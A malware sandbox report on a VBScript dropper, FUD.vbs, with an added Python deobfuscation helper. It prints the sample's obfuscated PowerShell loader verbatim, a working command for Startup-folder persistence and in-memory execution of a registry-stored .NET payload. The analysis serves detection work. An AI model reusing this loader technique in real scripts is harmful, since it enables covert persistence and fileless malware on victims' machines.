Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 120s
max time network: 120s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 28/02/2025, 15:40
Static task: static1
Behavioral task: behavioral1
Sample: FUD.vbs
Resource: win7-20240903-en
5 signatures
150 seconds
General
Target: FUD.vbs
Size: 325KB
MD5: d525be35ac5b7de70edb7c00529f1d83
SHA1: eef5cd4c355487132d225492acdc425fb0fe606d
SHA256: f9f35704de5a2355e9b8b7107613736b5501573cfb9794126867ccd73100ea98
SHA512: 32e399504a0669e0c83872a947cf24955489f2b3f75dae83cec2798681f4249d6bac02f861436fcbf6b8d2321045ab7fbc6c006bf33ca1402429ce799e254830
SSDEEP: 6144:PAbSQwEhvxxx06qUY2fVHavDdl8PI76KF51u7WJVzZF:PAbBlhqp2fZsDdlYI77BVlF
Score: 6/10
Malware Config
Signatures

pid  | Process
2400 | powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid  | Process
2400 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description             | pid  | Process
Token: SeDebugPrivilege | 2400 | powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
description                      | pid  | Process     | procid_target
PID 2720 wrote to memory of 2400 | 2720 | WScript.exe | 30
PID 2720 wrote to memory of 2400 | 2720 | WScript.exe | 30
PID 2720 wrote to memory of 2400 | 2720 | WScript.exe | 30
Processes

C:\Windows\System32\WScript.exe (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FUD.vbs"
  Signatures: Suspicious use of WriteProcessMemory
  PID: 2720

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, child of PID 2720)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FUD.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.vbs'; $roadtest = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $roadtest = -join $roadtest[-1..-$roadtest.Length];[<##>AppDomain<##>]::<##>('seaserviceurrentDomain'.replace('seaservice','C'))<##>.<##>('digeneticoad'.replace('digenetic','L'))([Convert]::FromBase64String($roadtest))<##>.<##>('estocsntryPoint'.replace('estocs','E'))<##>.<##>('Instolonoke'.replace('stolon','v'))($Null,$Null)<##>;
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    PID: 2400
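The PowerShell command launched by WScript.exe (PID 2400) does three things: it copies the dropped script into the user's Startup folder as svchost.vbs for persistence, it reads the Updates value under HKCU:\Software\Chrome\, reverses and joins it and base64-decodes the result, and it loads those bytes as a .NET assembly in memory with AppDomain.CurrentDomain.Load and calls its EntryPoint. The member names are hidden from string matching with empty block comments (<##>) and 'literal'.replace() tricks; -window 1 is WindowStyle Hidden. The report records no write to that registry value, so in this run the loader had nothing to decode. The following Python helper is an added analysis example, not part of the Triage report: it resolves the obfuscation, extracts the persistence path, and emulates the registry-value reassembly on a constructed stand-in value (the real Updates value was not captured). The names LOADER_CMD, FAKE_ASSEMBLY and FAKE_UPDATES_VALUE are this example's own.

```python
"""Added analysis helper (not part of the Triage report): deobfuscate the
PowerShell loader from the FUD.vbs process tree and emulate its payload reassembly."""
import base64
import re

# The -Command argument of PID 2400, copied verbatim from the process tree.
LOADER_CMD = (
    r"Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FUD.vbs' "
    r"'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.vbs'; "
    r"$roadtest = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); "
    r"$roadtest = -join $roadtest[-1..-$roadtest.Length];"
    r"[<##>AppDomain<##>]::<##>('seaserviceurrentDomain'.replace('seaservice','C'))<##>.<##>"
    r"('digeneticoad'.replace('digenetic','L'))([Convert]::FromBase64String($roadtest))<##>.<##>"
    r"('estocsntryPoint'.replace('estocs','E'))<##>.<##>('Instolonoke'.replace('stolon','v'))($Null,$Null)<##>;"
)

# Matches ('literal'.replace('needle','replacement')) as used to hide .NET member names.
_REPLACE_TRICK = re.compile(r"\(\s*'([^']*)'\.replace\('([^']*)','([^']*)'\)\s*\)")


def deobfuscate(cmd):
    """Strip empty block comments (<##>) and resolve the .replace() string tricks.
    .NET String.Replace is case-sensitive, so Python's str.replace is equivalent."""
    cleaned = cmd.replace("<##>", "")
    return _REPLACE_TRICK.sub(lambda m: m.group(1).replace(m.group(2), m.group(3)), cleaned)


def persistence_target(cmd):
    """Return the destination of the Copy-Item call, i.e. the persistence artifact."""
    m = re.search(r"Copy-Item\s+'([^']*)'\s+'([^']*)'", cmd)
    return m.group(2) if m else None


def reassemble_payload(updates_value):
    """Emulate: -join $roadtest[-1..-$roadtest.Length]; [Convert]::FromBase64String(...)
    If Updates is a REG_MULTI_SZ, PowerShell yields a string array and the index
    reverses the element order; if it is a single REG_SZ, the characters are reversed.
    Both cases are handled."""
    if isinstance(updates_value, str):
        joined = updates_value[::-1]
    else:
        joined = "".join(reversed(list(updates_value)))
    return base64.b64decode(joined)


# Constructed stand-in for the registry value (hypothetical; not captured in the report).
# A dropper storing the assembly this way writes the base64 text in reversed chunk order
# so that the loader's reversal restores it. A real .NET assembly starts with "MZ".
FAKE_ASSEMBLY = b"MZ\x90\x00" + b"constructed-stand-in-for-a-dotnet-assembly"
FAKE_B64 = base64.b64encode(FAKE_ASSEMBLY).decode()
FAKE_UPDATES_VALUE = [FAKE_B64[i:i + 16] for i in range(0, len(FAKE_B64), 16)][::-1]

if __name__ == "__main__":
    print(deobfuscate(LOADER_CMD))
    print("persistence:", persistence_target(LOADER_CMD))
    print("payload head:", reassemble_payload(FAKE_UPDATES_VALUE)[:2])
```

On a live host the same two artifacts are what to check first: the svchost.vbs copy in the user's Startup folder and the Updates value under HKCU:\Software\Chrome\; if the value is present, feeding it to reassemble_payload yields the assembly that Triage never saw.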